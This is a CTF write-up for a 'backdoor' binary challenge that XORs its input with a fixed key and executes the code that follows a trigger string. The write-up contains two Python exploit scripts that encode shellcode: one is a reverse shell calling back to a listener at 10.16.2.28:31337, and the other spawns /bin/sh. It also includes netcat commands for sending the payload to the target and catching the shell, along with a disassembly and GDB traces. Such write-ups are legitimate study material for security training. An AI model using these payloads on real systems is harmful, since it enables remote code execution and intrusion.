Backdoor program: 100
Description
Writing this up long after the challenge was released, sigh...
Program flow: read a string, XOR it with <baidu-rocks,froM-china-with-love>, and if the result equals n0b4ckd00, execute the code at str+0xa directly.
First problem: the byte 0x0b cannot be read by scanf, so the data after it is truncated.
Viewing it in EDB:
The drawback is that you cannot pass arguments, so it is generally not used...
In GDB you can pass arguments, set breakpoints, debug, inspect the stack, and so on.
PYTHON POC1:
The shellcode is from http://shell-storm.org/shellcode/files/shellcode-849.php (a simpler one is used later).
```python
# Python 2
from itertools import izip, cycle   # izip('ABCD', 'xy') --> Ax By
                                    # cycle('ABCD') --> A B C D A B C D A B C D ...
#ipaddr 10.16.2.28
#port 31337 (7a69)
#ipaddr='\x10\x10\x02\x1c'
#port = '7a\x69'
shellcode = (
    '\x31\xc0\x31\xdb\x31\xc9\x31\xd2'
    '\xb0\x66\xb3\x01\x51\x6a\x06\x6a'
    '\x01\x6a\x02\x89\xe1\xcd\x80\x89'
    '\xc6\xb0\x66\x31\xdb\xb3\x02\x68'
    #ipaddr
    '\x0a\x10\x02\x1c'
    '\x66\x68'
    #port
    '\x7a\x69'
    '\x66\x53\xfe'
    '\xc3\x89\xe1'
    '\x6a\x10\x51\x56\x89'
    '\xe1\xcd\x80\x31\xc9\xb1\x03\xfe'
    '\xc9\xb0\x3f\xcd\x80\x75\xf8\x31'
    '\xc0\x52\x68\x6e\x2f\x73\x68'
    '\x68'
    '\x2f\x2f\x62\x69\x89\xe3\x52\x53'
    '\x89\xe1\x52\x89\xe2\xb0\x0b\xcd'
    '\x80')
bd = '<baidu-rocks,froM-china-with-love>'
data = 'n0b4ckd00r' + shellcode + ' '
xordata = ''
for i in range(len(data)):
    xordata += chr(ord(bd[i % len(bd)]) ^ ord(data[i]))
open('payload.txt', 'wb').write(xordata)
import binascii
print repr(binascii.hexlify(xordata))
```
The offending byte in the encoded payload is `\x0b`.
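As an added example (my own code, not the author's), the following Python 3 model shows the two mechanisms this writeup relies on: the program's repeating-key XOR and `scanf("%s")` stopping at the first C whitespace byte. The sixteen bytes in `CAPTURED` are copied from the start of the stack dump shown later in the writeup; `DEMO_PLAINTEXT` is a constructed input whose eleventh byte encodes to 0x0b, so the model reproduces the truncation described above without any shellcode. Function names and the `C_SPACE` set are my own choices.

```python
KEY = b"<baidu-rocks,froM-china-with-love>"   # XOR key the program applies to its input
TRIGGER = b"n0b4ckd00r"                       # 10-byte magic value the backdoor compares against
C_SPACE = b" \t\n\v\f\r"                      # bytes C's isspace() accepts, i.e. where "%s" stops


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """XOR data with a repeating key. XOR is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def scanf_s(raw: bytes) -> bytes:
    """Model what scanf("%s") stores: leading whitespace is skipped, then bytes are
    copied until the next whitespace byte (or end of input)."""
    i = 0
    while i < len(raw) and raw[i] in C_SPACE:
        i += 1
    j = i
    while j < len(raw) and raw[j] not in C_SPACE:
        j += 1
    return raw[i:j]


def whitespace_positions(encoded: bytes) -> list:
    """Offsets in an encoded buffer holding a byte that "%s" treats as a terminator.
    Any such byte silently cuts the program's input short at that offset."""
    return [i for i, b in enumerate(encoded) if b in C_SPACE]


def decodes_to_trigger(raw: bytes) -> bool:
    """Detection-side check for a captured input: after the program's own read and
    XOR, does it start with the backdoor trigger?"""
    return xor_with_key(scanf_s(raw)).startswith(TRIGGER)


def truncation_report(plaintext: bytes) -> tuple:
    """(bytes intended, bytes the program actually receives) for a given plaintext."""
    encoded = xor_with_key(plaintext)
    return len(plaintext), len(scanf_s(encoded))


# First 16 bytes of the x/200bx dump from the writeup (the encoded trigger + shellcode start).
CAPTURED = bytes([0x52, 0x52, 0x03, 0x5d, 0x07, 0x1e, 0x49, 0x42,
                  0x5f, 0x11, 0x5a, 0xb3, 0x1d, 0xbd, 0x43, 0xa6])

# Constructed plaintext: byte 0x60 at offset 10 XORs with key byte 'k' (0x6b) to 0x0b,
# the vertical tab that scanf("%s") refuses to read past.
DEMO_PLAINTEXT = TRIGGER + b"\x60" + b"ABCD"

if __name__ == "__main__":
    print("captured input decodes to trigger:", decodes_to_trigger(CAPTURED))
    print("decoded bytes after the trigger:", xor_with_key(CAPTURED)[10:].hex())
    enc = xor_with_key(DEMO_PLAINTEXT)
    print("whitespace offsets in constructed payload:", whitespace_positions(enc))
    print("intended vs delivered bytes:", truncation_report(DEMO_PLAINTEXT))
```

`decodes_to_trigger` is the check a defender would run over inputs captured at the service: it reproduces exactly what the binary sees, so any input it flags would have reached the `str+0xa` branch. `whitespace_positions` explains the failure in POC1 in one call: a single 0x0b in the encoded buffer and everything after it is dropped by `scanf`.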
GDB commands to learn:
* info frame: show details of the current stack frame. To list all gdb commands, press Tab twice at the gdb prompt.
* xbreak: set a breakpoint at the exit point of the current function.
* step: step into the function.
* next: step over the function (do not enter it).
* bt (backtrace): show the program's stack.
```
(gdb) x/20i $eip          # inspect the code at EIP
=> 0x8048c00: push   %ebx
   0x8048c01: sub    $0x28,%esp
   0x8048c04: mov    %gs:0x14,%eax
   0x8048c0a: mov    %eax,0x1c(%esp)
   0x8048c0e: xor    %eax,%eax
   0x8048c10: lea    0x13(%esp),%edx
   0x8048c14: lea    0x1b(%esp),%eax
   0x8048c18: movb   $0x0,(%eax)
```
Examine memory: x/FMT ADDRESS. ADDRESS is an expression for the memory address to examine. FMT is a repeat count followed by a format letter and a size letter. Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal), t(binary), f(float), a(address), i(instruction), c(char) and s(string). Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).
Setting a breakpoint at 0x08048e10 in GDB:
```
(gdb) file backdoor_844d899c6320ac74a471e3c0db5e902e
(gdb) r < payload.txt
(gdb) break *0x08048e10
(gdb) x/200bx *(int*)($ebp+8)
```
0xbffff2a8: 0x52 0x52 0x03 0x5d 0x07 0x1e 0x49 0x42
0xbffff2b0: 0x5f 0x11 0x5a 0xb3 0x1d 0xbd 0x43 0xa6
0xbffff2b8: 0x7c 0xff 0xd3 0x0e 0xda 0x6f 0x30 0x47
0xbffff2c0: 0x71 0x03 0x75 0x02 0x2f 0xe5 0x8e 0xbb
0xbffff2c8: 0xe5 0xb7 0xfa 0xd2 0x07 0x58 0xbf 0xc6
0xbffff2d0: 0x2f 0x1a 0x7f 0x73 0x69 0x6f 0x4a 0x0e
0xbffff2d8: 0x08 0x06 0x2b 0x7e 0x9d 0xab 0xe0 0x8f
0xbffff2e0: 0x00 0x10 0xff 0xb7 0xc0 0x8a 0x04 0x08
0xbffff2e8: 0x01 0x00 0x00 0x00 0xa2 0x8f 0x04 0x08
0xbffff2f0: 0x01 0x00 0x00 0x00 0xc4 0xf3 0xff 0xbf
0xbffff2f8: 0xcc 0xf3 0xff 0xbf 0x18 0xf3 0xff 0xbf
0xbffff300: 0xa5 0xc4 0xd8 0xb7 0x30 0x10 0xff 0xb7
0xbffff308: 0x5b 0x8f 0x04 0x08 0x01 0x00 0x00 0x00
0xbffff310: 0x50 0x8f 0x04 0x08 0x00 0x00 0x00 0x00
0xbffff318: 0x98 0xf3 0xff 0xbf 0xd6 0x3b 0xd7 0xb7
0xbffff320: 0x01 0x00 0x00 0x00 0xc4 0xf3 0xff 0xbf
0xbffff328: 0xcc 0xf3 0xff 0xbf 0x00 0x70 0xeb 0xb7
0xbffff330: 0x80 0xf3 0xff 0xbf 0xff 0xff 0xff 0xff
0xbffff338: 0xf4 0xef 0xff 0xb7 0xf4 0x86 0x04 0x08
0xbffff340: 0x01 0x00 0x00 0x00 0x80 0xf3 0xff 0xbf
0xbffff348: 0x26 0x06 0xff 0xb7 0xb0 0xfa 0xff 0xb7
0xbffff350: 0x48 0x76 0xeb 0xb7 0xf4 0x2f 0xeb 0xb7
0xbffff358: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff360: 0x98 0xf3 0xff 0xbf 0x18 0x79 0x46 0xa0
0xbffff368: 0x08 0x0f 0xd7 0xf1 0x00 0x00 0x00 0x00
As you can see, the stack is corrupted and the constructed shellcode cannot run.
Next we add '\x90' at suitable spots.
The shellcode structure is as follows:
```
8048060: 31 c0             xor    eax,eax
8048062: 31 db             xor    ebx,ebx
8048064: 31 c9             xor    ecx,ecx
8048066: 31 d2             xor    edx,edx
8048068: b0 66             mov    al,0x66
804806a: b3 01             mov    bl,0x1
804806c: 51                push   ecx
804806d: 6a 06             push   0x6
804806f: 6a 01             push   0x1
8048071: 6a 02             push   0x2
8048073: 89 e1             mov    ecx,esp
8048075: cd 80             int    0x80
8048077: 89 c6             mov    esi,eax
8048079: b0 66             mov    al,0x66
804807b: 31 db             xor    ebx,ebx
804807d: b3 02             mov    bl,0x2
804807f: 68 c0 a8 01 0a    push   0xa01a8c0
8048084: 66 68 7a 69       pushw  0x697a
8048088: 66 53             push   bx
804808a: fe c3             inc    bl
804808c: 89 e1             mov    ecx,esp
804808e: 6a 10             push   0x10
8048090: 51                push   ecx
8048091: 56                push   esi
8048092: 89 e1             mov    ecx,esp
8048094: cd 80             int    0x80
8048096: 31 c9             xor    ecx,ecx
8048098: b1 03             mov    cl,0x3
0804809a <dupfd>:
804809a: fe c9             dec    cl
804809c: b0 3f             mov    al,0x3f
804809e: cd 80             int    0x80
80480a0: 75 f8             jne    804809a
80480a2: 31 c0             xor    eax,eax
80480a4: 52                push   edx
80480a5: 68 6e 2f 73 68    push   0x68732f6e
80480aa: 68 2f 2f 62 69    push   0x69622f2f
80480af: 89 e3             mov    ebx,esp
80480b1: 52                push   edx
80480b2: 53                push   ebx
80480b3: 89 e1             mov    ecx,esp
80480b5: 52                push   edx
80480b6: 89 e2             mov    edx,esp
80480b8: b0 0b             mov    al,0xb
80480ba: cd 80             int    0x80
```
Below, '\x90' is inserted at suitable places:
```python
    '\x66\x53\xfe'
    '\xc3\x89\xe1'
    + '\x90'            # inserted
    '\x6a\x10\x51\x56\x89'
    '\xe1\xcd\x80\x31\xc9\xb1\x03\xfe'
    '\xc9\xb0\x3f\xcd\x80\x75\xf8\x31'
    '\xc0\x52\x68\x6e\x2f\x73\x68'
    + '\x90\x90\x90'    # inserted
```
Debugging in gdb shows that scanf now reads the whole input.
Next:
```
nc 218.2.197.250 1337 < payload.txt
nc -lvp 31337
```
(local test screenshot)
This gives a shell; cat /home/ctf/flag
PYTHON POC2:
```python
# Python 2
'''
00401120 > 90             nop
00401121   90             nop
00401122   90             nop
00401123   31C0           xor eax,eax
00401125   50             push eax
00401126   68 2F2F7368    push 0x68732F2F
0040112B   68 2F62696E    push 0x6E69622F
00401130   89E3           mov ebx,esp
00401132   50             push eax
00401133   53             push ebx
00401134   89E1           mov ecx,esp
00401136   B0 0B          mov al,0xB
00401138   CD 80          int 0x80
'''
shellcode = (
    "\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F"
    "\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3"
    "\x50\x53\x89\xE1\xB0\x0B\xCD\x80")
bd = '<baidu-rocks,froM-china-with-love>'
data = 'n0b4ckd00r' + shellcode + ' '
xordata = ''
for i in range(len(data)):
    xordata += chr(ord(bd[i % len(bd)]) ^ ord(data[i]))
open('payload.txt', 'wb').write(xordata)
import binascii
print repr(binascii.hexlify(xordata))
```